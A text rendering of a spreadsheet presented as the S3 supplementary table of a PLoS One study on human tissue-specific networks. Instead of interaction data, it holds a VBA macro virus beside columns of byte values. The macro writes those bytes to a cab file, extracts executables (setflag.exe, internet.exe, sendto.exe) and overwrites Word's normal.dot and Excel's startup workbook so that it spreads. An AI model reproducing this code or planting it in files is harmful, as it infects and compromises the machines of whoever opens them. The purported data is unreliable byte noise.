# Supplementary material for: Construction and Analyses of Human Large-Scale Tissue Specific Networks
Source: PLoS One. 2014 Dec 16;9(12):e115074. doi: 10.1371/journal.pone.0115074 (PMC4267779; doi:10.1371/journal.pone.0115074)
Supplement: S3 Table — Housekeeping and tissue specific interactions. (XLSX) [file pone.0115074.s003.xlsx]

## Sheet: (m1)_(m2)_(m3)
	77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 …	Private Sub createcabfile()
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Dim ch As Byte
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	on error resume next
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Set fso = CreateObject("scripting.filesystemobject")
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Set w = CreateObject("wscript.shell")
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	myfolder = w.specialfolders("Templates") & "\Software\"
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	If Not fso.folderexists(myfolder) Then
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	fso.createfolder myfolder
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	End If
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	For i=1 to Workbooks.Count
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	If Workbooks(i).name="normal.xlm" then
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	workbooks(i).close
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 3…	fso.deletefile Application.StartupPath & "\normal.xlm"
	28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179…	End If
	241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 …	Next
	208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150…	For i=1 to Workbooks.Count
	33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105…	If Workbooks(i).name="norma1.xlm" then
	74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 13…	goto a1
	165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 1…	End If
	226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1…	Next
	58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 24…	cabfile= "c:\cab.cab"
	167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 1…	If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
	86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 8…	fso.delete cabfile
	94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103…	open cabfile for binary access write as #1
	173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 4…	For i = 1 To 150
	126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92…	hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
	128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 …	n=1
	71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 1…	m=instr(hv," ")
	217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 1…	do while m>0
	103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 1…	ch=CByte(mid(hv,n,m-n))
	119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 1…	put #1,,ch
	86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 17…	n=m+1
	246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 10…	m=instr(n,hv," ")
	255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 2…	loop
	59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238…	Next
	143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5…	close #1
	235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 2…	w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
	59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 20…	w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
	182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 1…	w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
	86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 6…	w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
	216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 …	fso.deletefile cabfile
	113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 …	fso.copyfile "c:\normal.dot", myfolder, True
	158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 …	set word=createobject("word.application")
	247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 12…	ntpath=word.NormalTemplate.Path & "\"
	216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30…	word.quit
	159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 17…	fso.copyfile "c:\normal.dot", ntpath, True
	58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 2…	fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
	10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164…	fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
	149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111…	set fold=fso.getfolder(w.SpecialFolders("SendTo"))
	189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 …	for each ff in fold.files
	179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132…	if instr(ff.name,"软盘")>0 then
